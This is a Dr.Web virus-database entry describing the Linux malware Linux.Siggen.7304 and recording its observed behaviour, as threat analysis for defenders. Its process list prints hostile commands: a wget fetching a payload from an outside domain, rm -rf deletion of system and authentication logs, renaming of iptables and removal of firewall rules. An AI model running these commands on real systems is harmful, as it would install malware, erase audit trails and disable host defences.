Mi biblioteca
Mi biblioteca

+ Añadir a la biblioteca

Soporte
Soporte 24 horas | Normas de contactar

Sus solicitudes

Perfil

Linux.Siggen.7304

Added to the Dr.Web virus database: 2024-04-30

Virus description added:

Technical Information

Malicious functions:
Launches processes:
  • mv /sbin/iptables /sbin/tokens
  • grep 46.101
  • rm -rf /var/log/auth.log /var/log/auth.log.1 /var/log/auth.log.2.gz /var/log/auth.log.3.gz /var/log/auth.log.4.gz
  • <SAMPLE_FULL_PATH> -c exec \x27<SAMPLE_FULL_PATH>\x27 \x22$@\x22 <SAMPLE_FULL_PATH>
  • mkdir /etc/calendar/cecece
  • grep 146.190
  • grep 144.126
  • md5sum
  • rm -rf /var/log/messages /var/log/messages.1 /var/log/messages.2.gz /var/log/messages.3.gz /var/log/messages.4.gz
  • rm -rf /root/.config/xmrig.json
  • sysctl -p
  • xargs -rL1 iptables -D INPUT -j DROP -s
  • mv /usr/sbin/iptables /usr/sbin/tokens
  • mv /sbin/tokens /sbin/iptables
  • grep 67.207
  • mkdir /etc/calendar
  • cat /tmp/.XlM-unix
  • rm -rf /var/log/syslog /var/log/syslog.1 /var/log/syslog.2.gz /var/log/syslog.3.gz /var/log/syslog.4.gz
  • head -c 8
  • wget --timeout=5 --tries=2 http://w.mane.fun/p.zip -q -O /tmp/p.zip
  • /usr/bin/mawk awk {print $8}
  • grep 172.105
  • grep 138.68
  • mv /usr/sbin/tokens /usr/sbin/iptables
  • rm -rf /var/www/html/config.json
  • grep 167.172
  • rm -rf /root/.xmrig.json
  • grep 172.104
  • <0xc>
  • grep 157.245
  • /usr/sbin/xtables-nft-multi iptables -L INPUT -v -n
  • rm -rf /var/log/secure*
  • sleep 1
Performs operations with the file system:
Creates folders:
  • /etc/calendar
  • /etc/calendar/cecece
Creates or modifies files:
  • /etc/sysctl.conf
  • /proc/sys/fs/file-max
  • /usr/sbin/iptables
  • /tmp/p.zip
Deletes files:
  • /var/log/messages
  • /var/log/messages.1
  • /var/log/messages.2.gz
  • /var/log/messages.3.gz
  • /var/log/messages.4.gz
  • /var/log/auth.log
  • /var/log/auth.log.1
  • /var/log/auth.log.2.gz
  • /var/log/auth.log.3.gz
  • /var/log/auth.log.4.gz
  • /var/log/syslog
  • /var/log/syslog.1
  • /var/log/syslog.2.gz
  • /var/log/syslog.3.gz
  • /var/log/syslog.4.gz
Network activity:
Establishes connection:
  • 8.#.8.8:53
  • 14#.##0.192.68:80
DNS ASK:
  • w.##ne.fun
Sends data to the following servers:
  • 14#.##0.192.68:80
Receives data from the following servers:
  • 14#.##0.192.68:80

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number